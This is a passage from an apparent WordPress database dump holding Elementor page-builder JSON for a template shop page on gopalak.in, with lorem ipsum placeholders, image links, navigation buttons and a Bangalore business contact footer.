"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8573,1497,'_elementor_page_assets','a:0:{}'),(8575,1498,'_elementor_edit_mode','builder'),(8576,1498,'_elementor_template_type','wp-page'),(8577,1498,'_elementor_version','3.7.7'),(8578,1498,'_wp_page_template','elementor_canvas'),(8579,1498,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 